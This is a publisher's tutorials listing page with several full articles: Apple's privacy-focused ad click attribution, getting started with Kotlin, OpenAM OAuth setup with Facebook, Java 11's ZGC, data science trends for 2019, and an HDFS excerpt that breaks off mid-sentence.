Search icon CANCEL
Subscription
0
Cart icon
Your Cart (0 item)
Close icon
You have no products in your basket yet
Save more on your purchases! discount-offer-chevron-icon
Savings automatically calculated. No voucher code required.
Arrow left icon
Explore Products
Best Sellers
New Releases
Books
Videos
Audiobooks
Learning Hub
Newsletter Hub
Free Learning
Arrow right icon
timer SALE ENDS IN
0 Days
:
00 Hours
:
00 Minutes
:
00 Seconds

How-To Tutorials

7019 Articles
article-image-apple-proposes-a-privacy-focused-ad-click-attribution-model-for-counting-conversions-without-tracking-users
Bhagyashree R
23 May 2019
5 min read
Save for later

Apple proposes a “privacy-focused” ad click attribution model for counting conversions without tracking users

Bhagyashree R
23 May 2019
5 min read
Yesterday, Apple announced a new ad attribution model, which aims to hit the right balance between online user privacy and enabling advertisers to measure the effectiveness of their ad campaigns. This model, named Privacy Preserving Ad Click Attribution, is implemented in WebKit and is offered as an experimental feature in Safari Technology Preview 82+. Ad attribution model and its privacy concerns Online advertising is one of the most effective media for businesses to expand their reach and find new customers. And, ad click attribution model allows you to analyze which of your many advertising campaigns or marketing channels are leading to actual conversions. Generally, ad attribution is done through cookies and something called “tracking pixels”. Cookies are small data files stored by your browser to remember stateful information, for instance, items added in the shopping cart in an online store. A tracking pixel is basically a piece of HTML code which is loaded when a user visits a website or opens an email. If proper privacy protections are not employed, websites can use this data for user profiling. What is worse is that this data can also be sent to third parties like data brokers, affiliate networks, and advertising networks. This collection of browsing data across multiple websites is what is referred to as cross-site tracking. How Apple’s ad attribution aims to help Apple’s ad attribution model is built directly into the browser and runs on-device. This will ensure that the browser vendor will not be able to see what advertisements are being clicked or what purchases are being made. The ‘Privacy Preserving Ad Click Attribution model’ works in three steps: Storing ad clicks According to Apple's alternate Privacy Preserving Ad Click Attribution, the page hosting the ad will be responsible for storing the ad clicks. It will do this via two optional attributes: ‘adDestination’ and ‘adCampaignID’. The ‘adDestination’ attribute is the domain the ad click is navigating the user to, and ‘adCampaignID’ is the identifier of the ad campaign. Neither the browser vendor nor the website will be allowed to read the stored ad click data or detect that it exists. This data will be stored for a limited time and in the case of WebKit, it is 7 days. Matching the conversions against stored ad clicks The second step of matching the conversions against stored ad clicks will allow advertisers to understand which of their ad campaigns are the most effective ones. Conversion is basically getting the user to perform the desired action according to your advertisement, for instance, a customer adding an item to the shopping cart or signing up for a new service. In this model, tracking pixels are used as a way to determine what all actions are taken by the user benefitting the business. Data like the location of the user, time of day, the value of the conversion, or some other relevant data are passed to the browser through different parameters. Apple ensures that no sensitive data like names, addresses, or other are stored. Sending out ad click attribution data In the last step, the browser reports to the website or marketer the existence of the conversion. After the conversion is matched to an ad, the browser will set a timer at random between 24 to 48 hours to send a stateless POST request to the advertiser. And, within this time it will pass the ad campaign and other parameters to the advertiser. Apple is previewing this model in Safari Technology Preview 82+. It is also proposing this model as a standard through the W3C Web Platform Incubator Community Group (WICG). The model has received mixed reaction from users. Some think that this model can help in reducing online tracking. A Reddit user supporting the initiative said, “Ad companies are not having trouble attributing campaigns. The problem is that small, uncoordinated "privacy" features cause Ad Tech companies to become far more aggressive in how they track users. It's not the companies that lose here, it's you. A standardized, privacy-centric method for companies to accomplish attribution will help end the arms race and move back to a more consumer-friendly model. Small edges are worth a fortune in Ads. This is like the war on drugs. Clamping down and assuming ad companies will walk away is way too optimistic. Instead, they will move deeper into the shadows at whatever the cost.” Others think that it is not a browser’s responsibility to help online advertisement and should be on the users’ side. “I certainly have never wanted my browser to report ad click attribution,” another Redditor remarked. Read the full announcement by Apple for more details. Apple Pay will soon support NFC tags to trigger payments U.S. Supreme Court ruled 5-4 against Apple on its App Store monopoly case Apple plans to make notarization a default requirement in all future macOS updates
Read more
  • 0
  • 0
  • 41225

article-image-getting-started-kotlin
Brent Watson
08 Mar 2017
6 min read
Save for later

Getting Started with Kotlin

Brent Watson
08 Mar 2017
6 min read
Kotlin has been gaining more and more attention recently. With its 1.1 release, the language has proved both stable and usable.  In this article we’re going to cover a few different things: what is Kotlin and why it’s become popular, how to get started, where it’s most effective, and where to go next if you want to learn more. What is Kotlin?  Kotlin is a programing language.  Much like Scala or Groovy.It is a language that targets the JVM. It is developed by JetBrains, who make the IDEs that you know and love so much. The same diligence and finesse that is put into IntelliJ, PyCharm, Resharper, and their many other tools also shines through with Kotlin.  There are two secret ingredients that make Kotlin such a joy to use. First, since Kotlin compiles to Java bytecode, it is 100% interoperable with your existing Java code. Second, since JetBrains has control over both language and IDE, the tooling support is beyond excellent.  Here’s a quick example of some interoperability between Java and Kotlin:  Person.kt data class Person( val title: String?, // String type ends with “?”, so it is nullable. val name: String, // val's are immutable. “String” field, so non-null. var age: Int// var's are mutable. ) PersonDemo.java Person person = new Person("Mr.", "John Doe", 23); person.getAge(); // data classes provide getter and setters automatically. person.toString(); // ... in addition to toString, equals, hashCode, and copy methods.  The above example shows a “data class” (think Value Object / Data Transfer Object) in Kotlin being used by a Java class. Not only does the code work seamlessly, but also the JetBrains IDE allows you to navigate, auto-complete, debug, and refactor these together without skipping a beat. Continuing on with the above example, we’ll show how you might want to filter a list of Person objects using Kotlin.  Filters.kt fun demoFilter(people: List<Person>) : List<String> { return people .filter { it.age>35 } .map { it.name} } FiltersApplied.java List<String> names = new Filters().demoFilter(people); The simple addition of higher order functions (such as map, filter, reduce, sum, zip, and so on) in Kotlin greatly reduces the boilerplate code you usually have to write in Java programs when iterating through collections. The above filtering code in Java would require you to create a temporary list of results, iterate through people, perform an if check on age, add name to the list, then finally return the list. The above Kotlin version is not only 1 line, but it can actually be reduced even further since Kotlin supports Single Expression Functions: fun demoFilter(people: List<Person>) = people.filter{ it.age>35 }.map { it.name } // return type and return keyword replaced with “=”. Another Kotlin feature that greatly reduces the boilerplate found in Java code comes from its more advanced type system that treats nullable types differently from non-null types. The Java version of: if (people != null && !people.isEmpty() &&people.get(0).getAddress() != null &&people.get(0).getAddress().getStreet() != null) { return people.get(0).getAddress().getStreet(); }  Using Kotlin’s “?” operator that checks for null before continuing to evaluate an expression, we can simplify this statement drastically: return people?.firstOrNull()?.address?.street Not only does this reduce the verbosity inherent in Java, but it also helps to eliminate the “Billion dollar mistake” in Java: NullPointerExceptions.  The ability to mark a type as either nullable or not-null (Address? vs Address) means that the compiler can ensure null checks are properly done at compile time, not at runtime in production.  These are just a couple of examples of how Kotlin helps to both reduce the number of lines in your code and also reduce the often unneeded complexity. The more you use Kotlin, the more of these idioms you will find hard to start living without.  Android  More than any other industry, Kotlin has gained the most ground with Android developers.  Since Kotlin compiles to Java 6 bytecode, it can be used to build Android applications.  Since the interoperability between Kotlin and Java is so simple, it can be slowly added into a larger Java Android project over time (or any Java project for that matter). Given that Android developers do not yet have access to the nice features of Java 8, Kotlin provides these and gives Android developers many of the new language features they otherwise can only read about. The Kotlin team realized this early on and has provided many libraries and tools targeted at Android devs. Here are a couple short examples of how Kotlin can simplify working with the Android SDK: context.runOnUiThread{ ... } button?.setOnClickListener{ Toast.makeText(...) } Android developers will immediately understand the reduced boilerplate here.  If you are not an Android developer, trust me, this is much better.  If you are an Android developer I would suggest to you take a look at both Kotlin Android Extensions and Anko.  Extension Functions The last feature of Kotlin we will look at today is one of the most useful features.  This is the ability to write Extension Functions. Think of these as the ability to add your own method to any existing class.  Here is a quick example of extending Java’s String class to add a prepend method: fun String.prepend(str: String) = str + this Once imported, you can use this from any Kotlin code as though it were a method on String.  Consider the ability to extend any system or framework class.  Suddenly all of your utility methods become extension methods and your code starts to look intentionally designed instead of patched together. Maybe you’d like to add a dpToPx() method on your Android Context class. Or, maybe you’d like to add a subscribeOnNewObserveOnMain() method on your RxJava Observable class.  Well, now you can.  Next Steps If you’re interested in trying Kotlin, grab a copy of the IntelliJ IDEA IDE or Android Studio and install the Kotlin plugin to get started. There is also a very well built online IDE maintained by JetBrains along with a series of exercises called Kotin Koans. These can be found at http://try.kotlinlang.org/.  For more information on Kotlin, check out https://kotlinlang.org/ .  About the author  Brent Watson is an Android engineer in NYC. He is a developer, entrepreneur, author, TEDx speaker, and Kotlin advocate. He can be found at http://brentwatson.com/.
Read more
  • 0
  • 0
  • 41190

article-image-oauth-authentication
Packt
02 Sep 2013
6 min read
Save for later

OAuth Authentication

Packt
02 Sep 2013
6 min read
(For more resources related to this topic, see here.) Understanding OAuth OAuth has the concept of Providers and Clients. An OAuth Provider is like a SAML Identity Provider, and is the place where the user enters their authentication credentials. Typical OAuth Providers include Facebook and Google. OAuth Clients are resources that want to protect resources, such as a SAML Service Provider. If you have ever been to a site that has asked you to log in using your Twitter or LinkedIn credentials then odds are that site was using OAuth. The advantage of OAuth is that a user’s authentication credentials (username and password, for instance) is never passed to the OAuth Client, just a range of tokens that the Client requested from the Provider and which are authorized by the user. OpenAM can act as both an OAuth Provider and an OAuth Client. This chapter will focus on using OpenAM as an OAuth Client and using Facebook as an OAuth Provider. Preparing Facebook as an OAuth Provider Head to https://developers.facebook.com/apps/ and create a Facebook App. Once this is created, your Facebook App will have an App ID and an App Secret. We’ll use these later on when configuring OpenAM. Facebook won’t let a redirect to a URL (such as our OpenAM installation) without being aware of the URL. The steps for preparing Facebook as an OAuth provider are as follows: Under the settings for the App in the section Website with Facebook Login we need to add a Site URL. This is a special OpenAM OAuth Proxy URL, which for me was http://openam.kenning.co.nz:8080/openam/oauth2c/OAuthProxy.jsp as shown in the following screenshot: Click on the Save Changes button on Facebook. My OpenAM installation for this chapter was directly available on the Internet just in case Facebook checked for a valid URL destination. Configuring an OAuth authentication module OpenAM has the concept of authentication modules, which support different ways of authentication, such as OAuth, or against its Data Store, or LDAP or a Web Service. We need to create a new Module Instance for our Facebook OAuth Client. Log in to OpenAM console. Click on the Access Control tab, and click on the link to the realm / (Top Level Realm). Click on the Authentication tab and scroll down to the Module Instances section. Click on the New button. Enter a name for the New Module Instance and select OAuth 2.0 as the Type and click on the OK button. I used the name Facebook. You will then see a screen as shown: For Client Id, use the App ID value provided from Facebook. For the Client Secret use the App Secret value provided from Facebook as shown in the preceding screenshot. Since we’re using Facebook as our OAuth Provider, we can leave the Authentication Endpoint URL, Access Token Endpoint URL, and User Profile Service URL values as their default values. Scope defines the permissions we’re requesting from the OAuth Provider on behalf of the user. These values will be provided by the OAuth Provider, but we’ll use the default values of email and read_stream as shown in the preceding screenshot. Proxy URL is the URL we copied to Facebook as the Site URL. This needs to be replaced with your OpenAM installation value. The Account Mapper Configuration allows you to map values from your OAuth Provider to values that OpenAM recognizes. For instance, Facebook calls emails email while OpenAM references values from the directory it is connected to, such as mail in the case of the embedded LDAP server. This goes the same for the Attribute Mapper Configuration. We’ll leave all these sections as their defaults as shown in the preceding screenshot. OpenAM allows attributes passed from the OAuth Provider to be saved to the OpenAM session. We’ll make sure this option is Enabled as shown in the preceding screenshot. When a user authenticates against an OAuth Provider, they are likely to not already have an account with OpenAM. If they do not have a valid OpenAM account then they will not be allowed access to resources protected by OpenAM. We should make sure that the option to Create account if it does not exist is Enabled as shown in the preceding screenshot. Forcing authentication against particular authentication modules In the writing of this book I disabled the Create account if it does not exist option while I was testing. Then when I tried to log into OpenAM I was redirected to Facebook, which then passed my credentials to OpenAM. Since there was no valid OpenAM account that matched my Facebook credentials I could not log in. For your own testing, it would be recommended to use http://openam.kenning.co.nz:8080/openam/UI/Login?module=Facebook rather than changing your authentication chain. Thankfully, you can force a login using a particular authentication module by adjusting the login URL. By using http://openam.kenning.co.nz:8080/openam/UI/Login?module=DataStore, I was able to use the Data Store rather than OAuth authentication module, and log in successfully. For our newly created accounts we can choose to prompt the user to create a password and enter an activation code. For our prototype we’ll leave this option as Disabled. The flip side to Single Sign On is Single Log Out. Your OAuth Provider should provide a logout URL which we could possibly call to log out a user when they log out of OpenAM. The options we have when a user logs out of OpenAM is to either not log them out of the OAuth Provider, to log them out of the OAuth Provider, or to ask the user. If we had set earlier that we wanted to enforce password and activation token policies, then we would need to enter details of an SMTP server, which would be used to email the activation token to the user. For the purposes of our prototype we’ll leave all these options blank. Click on the Save button. Summary This article served as a quick primer on what OAuth is and how to achieve it with OpenAM. It covered the concept of using Facebook as an OAuth provider and configuring an OAuth module. It focused on using OpenAM as an OAuth Client and using Facebook as an OAuth Provider. This would really help when we might want to allow authentication against Facebook or Google. Resources for Article: Further resources on this subject: Getting Started with OpenSSO [Article] OpenAM: Oracle DSEE and Multiple Data Stores [Article] OpenAM Identity Stores: Types, Supported Types, Caching and Notification [Article]
Read more
  • 0
  • 0
  • 41186

article-image-getting-started-with-z-garbage-collectorzgc-in-java-11-tutorial
Vincy Davis
13 Jun 2019
9 min read
Save for later

Getting started with Z Garbage Collector (ZGC) in Java 11 [Tutorial]

Vincy Davis
13 Jun 2019
9 min read
Java 11 includes a lot of improvements and changes in the GC(Garbage Collection) domain. Z Garbage Collector (ZGC) is scalable, with low latency. It is a completely new GC, written from scratch. It can work with heap memory, ranging from KBs to a large TB memory. As a concurrent garbage collector, ZGC promises not to exceed application latency by 10 milliseconds, even for bigger heap sizes. It is also easy to tune. It was released with Java 11 as an experimental GC. Work is in progress on this GC in OpenJDK and more changes can be expected over time. This article is an excerpt taken from the book, Java 11 and 12 - New Features, written by Mala Gupta. In this book, you will learn the latest developments in Java, right from variable type inference and simplified multithreading through to performance improvements, and much more. In this article, you will understand the need of ZGC, its features, its working, ZGC heap, ZGC phases, and colored pointers. Need for Z Garbage Collector One of the features that resulted in the rise of Java in the early days was its automatic memory management with its GCs, which freed developers from manual memory management and lowered memory leaks. However, with unpredictable timings and durations, garbage collection can (at times) do more harm to an application than good. Increased latency directly affects the throughput and performance of an application. With ever-decreasing hardware costs and programs engineered to use largish memories, applications are demanding lower latency and higher throughput from garbage collectors. ZGC promises a latency of no more than 10 milliseconds, which doesn't increase with heap size or a live set. This is because its stop-the-world pauses are limited to root scanning. Features of Z Garbage Collector ZGC brings in a lot of features, which have been instrumental in its proposal, design, and implementation. One of the most outstanding features of ZGC is that it is a concurrent GC. Other features include: It can mark memory and copy and relocate it, all concurrently. It also has a concurrent reference processor. As opposed to the store barriers that are used by another HotSpot GCs, ZGC uses load barriers. The load barriers are used to keep track of heap usage. One of the intriguing features of ZGC is the usage of load barriers with colored pointers. This is what enables ZGC to perform concurrent operations when Java threads are running, such as object relocation or relocation set selection. ZGC is more flexible in configuring its size and scheme. Compared to G1, ZGC has better ways to deal with very large object allocations. ZGC is a single-generation GC. It also supports partial compaction. ZGC is also highly performant when it comes to reclaiming memory and reallocating it. ZGC is NUMA-aware, which essentially means that it has a NUMA-aware memory allocator. Getting started with Z Garbage Collector Working with ZGC involves multiple steps. The JDK binary should be installed, which is specific to Linux/x64, and build and start it. The following commands can be used to download ZGC and build it on your system: $ hg clone http://hg.openjdk.java.net/jdk/jdk $ cd zgc $ sh configure --with-jvm-features=zgc $ make images After execution of the preceding commands, the JDK root directory can be found in the following location: g./build/linux-x86_64-normal-server-release/images/jdk Java tools, such as java, javac, and others can be found in the /bin subdirectory of the preceding path (its usual location). Let's create a basic HelloZGC class, as follows: class HelloZGC { public static void main(String[] args) { System.out.println("Say hello to new low pause GC - ZGC!"); } } The following command can be used to enable ZGC and use it: java -XX:+UnlockExperimentalVMOptions -XX:+UseZGC HelloZGC Since ZGC is an experimental GC, the user needs to unlock it using the runtime option, that is, XX:+UnlockExperimentalVMOptions. For enabling basic GC logging, the user can add the -Xlog:gc option. Detailed logging is helpful while fine-tuning an application. The user can enable it by using the -Xlog:gc* option  as follows: java -XX:+UnlockExperimentalVMOptions -XX:+UseZGC -Xlog:gc* HelloZGC The previous command will output all the logs to the console, which could make it difficult to search for specific content. The user can specify the logs to be written to a file as follows: java -XX:+UnlockExperimentalVMOptions -XX:+UseZGC -Xlog:gc:mylog.log* HelloZGC Z Garbage Collector heap ZGC divides memory into regions, also called ZPages. ZPages can be dynamically created and destroyed. These can also be dynamically sized (unlike the G1 GC), which are multiples of 2 MB. Here are the size groups of heap regions: Small (2 MB) Medium (32 MB) Large (N * 2 MB) ZGC heap can have multiple occurrences of these heap regions. The medium and large regions are allocated contiguously, as shown in the following diagram: Unlike other GCs, the physical heap regions of ZGC can map into a bigger heap address space (which can include virtual memory). This can be crucial to combat memory fragmentation issues. Imagine that the user can allocate a really big object in memory, but can't do so due to unavailability of contiguous space in memory. This often leads to multiple GC cycles to free up enough contiguous space. If none are available, even after (multiple) GC cycle(s), the JVM will shut down with OutOfMemoryError. However, this particular use case is not an issue with the ZGC. Since the physical memory maps to a bigger address space, locating a bigger contiguous space is feasible. Z Garbage Collector phases A GC cycle of ZGC includes multiple phases: Pause Mark Start Pause Mark End Pause Relocate Start In the first phase, Pause Mark Start, ZGC marks objects that have been pointed to by roots. This includes walking through the live set of objects, and then finding and marking them. This is by far one of the most heavy-duty workloads in the ZGC GC cycle. Once this completes, the next cycle is Pause Mark Start, which is used for synchronization and starts with a short pause of 1 ms. In this second phase, ZGC starts with reference processing and moves to week-root cleaning. It also includes the relocation set selection. ZGC marks the regions it wants to compact. The next step, Pause Relocate Start, triggers the actual region compaction. It begins with root scanning pointing into the location set, followed by the concurrent reallocation of objects in the relocation set. The first phase, that is, Pause Mark Start, also includes remapping the live data. Since marking and remap of live data is the most heavy-duty GC operation, it isn't executed as a separate one. Remap starts after Pause Relocate Start but overlaps with the Pause Mark Start phase of the next GC cycle. Colored pointers Colored pointers are one of the core concepts of ZGC. It enables ZGC to find, mark, locate, and remap the objects. It doesn't support x32 platforms. Implementation of colored points needs virtual address masking, which could be accomplished either in the hardware, operating system, or software. The following diagram shows the 64-bit pointer layout: As shown in the preceding diagram, the 64-bit object reference is divided as follows: 18 bits: Unused bits 1-bit: Finalizable 1-bit: Remapped 1-bit: Marked1 1-bit: Marked0 42 bits: Object Address The first 18 bits are reserved for future use. The 42 bits can address up to 4 TB of address space. Now comes the remaining, intriguing, 4 bits. The Marked1 and Marked0 bits are used to mark objects for garbage collection. By setting the single bit for Remapped, an object can be marked not pointing to into the relocation set. The last 1-bit for finalizing relates to concurrent reference processing. It marks that an object can only be reachable through a finalizer. When the user runs ZGC on a system, it will be notice that it uses a lot of virtual memory space, which is not the same as the physical memory space. This is due to heap multi-mapping. It specifies how the objects with the colored pointers are stored in the virtual memory. As an example, for a colorless pointer, say, 0x0000000011111111, its colored pointers would be 0x0000100011111111 (remapped bit set), 0x0000080011111111 (Marked1 bit set), and 0x0000040011111111 (Marked0 bit set). The same physical heap memory would map to three different locations in address space, each corresponding to the colored pointer. This would be implemented differently when the mapping is handled differently. Tuning Z Garbage Collector To get the optimal performance,  a heap size must be set up, that can not only store the live set of your application but also has enough space to service the allocations. ZGC is a concurrent garbage collector. By setting the amount of CPU time that should be assigned to ZGC threads, the user can control how often the GC kicks in. It can be done so by using the following option: -XX:ConcGCThreads=<number> A higher value for the ConcGCThreads option will leave less amount of CPU time for your application. On the other hand, a lower value may result in your application struggling for memory; your application might generate more garbage than what is collected by ZGC. ZGC can also use default values for ConcGCThreads. To fine-tune your application on this parameter, you might prefer to execute against test values. For advanced ZGC tuning, the user can also enable large pages for enhanced performance of your application. It can be done by using the following option: -XX:+UseLargePages Instead of enabling large pages, the user can also enable transparent huge pages by using the following option: -XX:+UseTransparentHugePage The preceding option also includes additional settings and configurations, which can be accessed by using ZGC's official wiki page. ZGC is a NUMA-aware GC. Applications executing on the NUMA machine can result in a noticeable performance gain. By default, NUMA support is enabled for ZGC. However, if the JVM realizes that it is bound to a subset in the JVM, this feature can be disabled. To override a JVM's decision, the following option can be used: -XX:+UseNUMA Summary We have briefly discussed the scalable, low latency GC for OpenJDK—ZGC. It is an experimental GC, which has been written from scratch. As a concurrent GC, it promises max latency to be less than 10 milliseconds, which doesn't increase with heap size or live data. At present, it only works with Linux/x64. More platforms can be supported in the future if there is considerable demand for it. To know more about the applicability of Java's new features, head over to the book, Java 11 and 12 – New Features. Using lambda expressions in Java 11 [Tutorial] Creating a simple modular application in Java 11 [Tutorial] Java 11 is here with TLS 1.3, Unicode 11, and more updates
Read more
  • 0
  • 0
  • 41172

article-image-quantum-computing-edge-analytics-and-meta-learning-key-trends-in-data-science-and-big-data-in-2019
Richard Gall
18 Dec 2018
11 min read
Save for later

Quantum computing, edge analytics, and meta learning: key trends in data science and big data in 2019

Richard Gall
18 Dec 2018
11 min read
When historians study contemporary notions of data in the early 21st century, 2018 might well be a landmark year. In many ways this was the year when Big and Important Issues - from the personal to the political - began to surface. The techlash, a term which has defined the year, arguably emerged from conversations and debates about the uses and abuses of data. But while cynicism casts a shadow on the brightly lit data science landcape, there’s still a lot of optimism out there. And more importantly, data isn’t going to drop off the agenda any time soon. However, the changing conversation in 2018 does mean that the way data scientists, analysts, and engineers use data and build solutions for it will change. A renewed emphasis on ethics and security is now appearing, which will likely shape 2019 trends. But what will these trends be? Let’s take a look at some of the most important areas to keep an eye on in the new year. Meta learning and automated machine learning One of the key themes of data science and artificial intelligence in 2019 will be doing more with less. There are a number of ways in which this will manifest itself. The first is meta learning. This is a concept that aims to improve the way that machine learning systems actually work by running machine learning on machine learning systems. Essentially this allows a machine learning algorithm to learn how to learn. By doing this, you can better decide which algorithm is most appropriate for a given problem. Find out how to put meta learning into practice. Learn with Hands On Meta Learning with Python. Automated machine learning is closely aligned with meta learning. One way of understanding it is to see it as putting the concept of automating the application of meta learning. So, if meta learning can help better determine which machine learning algorithms should be applied and how they should be designed, automated machine learning makes that process a little smoother. It builds the decision making into the machine learning solution. Fundamentally, it’s all about “algorithm selection, hyper-parameter tuning, iterative modelling, and model assessment,” as Matthew Mayo explains on KDNuggets. Automated machine learning tools What’s particularly exciting about automated machine learning is that there are already a number of tools that make it relatively easy to do. AutoML is a set of tools developed by Google that can be used on the Google Cloud Platform, while auto-sklearn, built around the scikit-learn library, provides a similar out of the box solution for automated machine learning. Although both AutoML and auto-sklearn are very new, there are newer tools available that could dominate the landscape: AutoKeras and AdaNet. AutoKeras is built on Keras (the Python neural network library), while AdaNet is built on TensorFlow. Both could be more affordable open source alternatives to AutoML. Whichever automated machine learning library gains the most popularity will remain to be seen, but one thing is certain: it makes deep learning accessible to many organizations who previously wouldn’t have had the resources or inclination to hire a team of PhD computer scientists. But it’s important to remember that automated machine learning certainly doesn’t mean automated data science. While tools like AutoML will help many organizations build deep learning models for basic tasks, for organizations that need a more developed data strategy, the role of the data scientist will remain vital. You can’t after all, automate away strategy and decision making. Learn automated machine learning with these titles: Hands-On Automated Machine Learning TensorFlow 1.x Deep Learning Cookbook         Quantum computing Quantum computing, even as a concept, feels almost fantastical. It's not just cutting-edge, it's mind-bending. But in real-world terms it also continues the theme of doing more with less. Explaining quantum computing can be tricky, but the fundamentals are this: instead of a binary system (the foundation of computing as we currently know it), which can be either 0 or 1, in a quantum system you have qubits, which can be 0, 1 or both simultaneously. (If you want to learn more, read this article). What Quantum computing means for developers So, what does this mean in practice? Essentially, because the qubits in a quantum system can be multiple things at the same time, you are then able to run much more complex computations. Think about the difference in scale: running a deep learning system on a binary system has clear limits. Yes, you can scale up in processing power, but you’re nevertheless constrained by the foundational fact of zeros and ones. In a quantum system where that restriction no longer exists, the scale of the computing power at your disposal increases astronomically. Once you understand the fundamental proposition, it becomes much easier to see why the likes of IBM and Google are clamouring to develop and deploy quantum technology. One of the most talked about use cases is using Quantum computers to find even larger prime numbers (a move which contains risks given prime numbers are the basis for much modern encryption). But there other applications, such as in chemistry, where complex subatomic interactions are too detailed to be modelled by a traditional computer. It’s important to note that Quantum computing is still very much in its infancy. While Google and IBM are leading the way, they are really only researching the area. It certainly hasn’t been deployed or applied in any significant or sustained way. But this isn’t to say that it should be ignored. It’s going to have a huge impact on the future, and more importantly it’s plain interesting. Even if you don’t think you’ll be getting to grips with quantum systems at work for some time (a decade at best), understanding the principles and how it works in practice will not only give you a solid foundation for major changes in the future, it will also help you better understand some of the existing challenges in scientific computing. And, of course, it will also make you a decent conversationalist at dinner parties. Who's driving Quantum computing forward? If you want to get started, Microsoft has put together the Quantum Development Kit, which includes the first quantum-specific programming language Q#. IBM, meanwhile, has developed its own Quantum experience, which allows engineers and researchers to run quantum computations in the IBM cloud. As you investigate these tools you’ll probably get the sense that no one’s quite sure what to do with these technologies. And that’s fine - if anything it makes it the perfect time to get involved and help further research and thinking on the topic. Get a head start in the Quantum Computing revolution. Pre-order Mastering Quantum Computing with IBM QX.           Edge analytics and digital twins While Quantum lingers on the horizon, the concept of the edge has quietly planted itself at the very center of the IoT revolution. IoT might still be the term that business leaders and, indeed, wider society are talking about, for technologists and engineers, none of its advantages would be possible without the edge. Edge computing or edge analytics is essentially about processing data at the edge of a network rather than within a centralized data warehouse. Again, as you can begin to see, the concept of the edge allows you to do more with less. More speed, less bandwidth (as devices no longer need to communicate with data centers), and, in theory, more data. In the context of IoT, where just about every object in existence could be a source of data, moving processing and analytics to the edge can only be a good thing. Will the edge replace the cloud? There's a lot of conversation about whether edge will replace cloud. It won't. But it probably will replace the cloud as the place where we run artificial intelligence. For example, instead of running powerful analytics models in a centralized space, you can run them at different points across the network. This will dramatically improve speed and performance, particularly for those applications that run on artificial intelligence. A more distributed world Think of it this way: just as software has become more distributed in the last few years, thanks to the emergence of the edge, data itself is going to be more distributed. We'll have billions of pockets of activity, whether from consumers or industrial machines, a locus of data-generation. Find out how to put the principles of edge analytics into practice: Azure IoT Development Cookbook Digital twins An emerging part of the edge computing and analytics trend is the concept of digital twins. This is, admittedly, still something in its infancy, but in 2019 it’s likely that you’ll be hearing a lot more about digital twins. A digital twin is a digital replica of a device that engineers and software architects can monitor, model and test. For example, if you have a digital twin of a machine, you could run tests on it to better understand its points of failure. You could also investigate ways you could make the machine more efficient. More importantly, a digital twin can be used to help engineers manage the relationship between centralized cloud and systems at the edge - the digital twin is essentially a layer of abstraction that allows you to better understand what’s happening at the edge without needing to go into the detail of the system. For those of us working in data science, digital twins provide better clarity and visibility on how disconnected aspects of a network interact. If we’re going to make 2019 the year we use data more intelligently - maybe even more humanely - then this is precisely the sort of thing we need. Interpretability, explainability, and ethics Doing more with less might be one of the ongoing themes in data science and big data in 2019, but we can’t ignore the fact that ethics and security will remain firmly on the agenda. Although it’s easy to dismiss these issues issues as separate from the technical aspects of data mining, processing, and analytics, but it is, in fact, deeply integrated into it. One of the key facets of ethics are two related concepts: explainability and interpretability. The two terms are often used interchangeably, but there are some subtle differences. Explainability is the extent to which the inner-working of an algorithm can be explained in human terms, while interpretability is the extent to which one can understand the way in which it is working (eg. predict the outcome in a given situation). So, an algorithm can be interpretable, but you might not quite be able to explain why something is happening. (Think about this in the context of scientific research: sometimes, scientists know that a thing is definitely happening, but they can’t provide a clear explanation for why it is.) Improving transparency and accountability Either way, interpretability and explainability are important because they can help to improve transparency in machine learning and deep learning algorithms. In a world where deep learning algorithms are being applied to problems in areas from medicine to justice - where the problem of accountability is particularly fraught - this transparency isn’t an option, it’s essential. In practice, this means engineers must tweak the algorithm development process to make it easier for those outside the process to understand why certain things are happening and why they aren't. To a certain extent, this ultimately requires the data science world to take the scientific method more seriously than it has done. Rather than just aiming for accuracy (which is itself often open to contestation), the aim is to constantly manage that gap between what we’re trying to achieve with an algorithm and how it goes about actually doing that. You can learn the basics of building explainable machine learning models in the Getting Started with Machine Learning in Python video.          Transparency and innovation must go hand in hand in 2019 So, there are two fundamental things for data science in 2019: improving efficiency, and improving transparency. Although the two concepts might look like the conflict with each other, it's actually a bit of a false dichotomy. If we realised that 12 months ago, we might have avoided many of the issues that have come to light this year. Transparency has to be a core consideration for anyone developing systems for analyzing and processing data. Without it, the work your doing might be flawed or unnecessary. You’re only going to need to add further iterations to rectify your mistakes or modify the impact of your biases. With this in mind, now is the time to learn the lessons of 2018’s techlash. We need to commit to stopping the miserable conveyor belt of scandal and failure. Now is the time to find new ways to build better artificial intelligence systems.
Read more
  • 0
  • 0
  • 41148

article-image-what-makes-hadoop-so-revolutionary
Packt
20 Feb 2018
17 min read
Save for later

What makes Hadoop so revolutionary?

Packt
20 Feb 2018
17 min read
In this article by Sourav Gulati and Sumit Kumar authors of book Apache Spark 2.x for Java Developers , explain in classical sense if we are to talk of Hadoop, then it comprises of two components a storage layer called HDFS and a processing layer called MapReduce. The resource management task prior to Hadoop 2.X was done using MapReduce Framework of Hadoop itself, however that changed with the introduction of YARN. In Hadoop 2.0 YARN was introduced as the third component of Hadoop to manage the resources of Hadoop Cluster and make it more Map Reduce agnostic. (For more resources related to this topic, see here.) HDFS Hadoop Distributed File System as the name suggests is a distributed file system based on the lines of Google File System written in Java. In practice HDFS resembles closely like any other UNIX file system with support for common file operations like ls, cp, rm, du, cat and so on. However what makes HDFS stand out despite its simplicity, is its mechanism to handle node failure in Hadoop cluster without effectively changing the seek time for accessing stored files. HDFS cluster consists of two major components: Data Nodes and Name Node. HDFS has a unique way of storing data on HDFS clusters (cheap commodity networked commodity computers). It splits the regular file in smaller chunks called blocks and then makes an exact number of copies of such chunks depending on the replication factor for that file. After that it copies such chunks to different Data Nodes of the Cluster. Name Node Name Node is responsible for managing the metadata of HDFS cluster such as list of files and folders that exist in a cluster, number of splits each file is divided into and their replication and storage at different Data Nodes. It also maintains and manages the namespace and file permission of all the files available in HDFS cluster. Apart from bookkeeping Name Node also has a supervisory role that keeps a watch on the replication factor of all the files and if some block goes missing then issue commands to replicate the missing block of data. It also generates reports to ascertain cluster health too. It is important to note that all the communication for supervisory task happens from Data Node to Name node that is Data Node sends reports a.k.a block reports to Name Node and it is then that Name Node responds to them by issuing different commands or instructions as the need may be. HDFS I/O A HDFS read operation from a client involves: Client requests the NameNode to determine where the actual data blocks are stored for a given file. Name Node obliges by providing the Block IDs and locations of the hosts (Data Node ) where the data can be found. The client contacts the Data Node with respective Block IDs to fetches the data from Data Node while preserving the order of the block files. A HDFS write operation from a client involves: Client contacts the Name Node to update the namespace with the file name and verify necessary permissions. If the file exists then Name Node throws an error else return the client 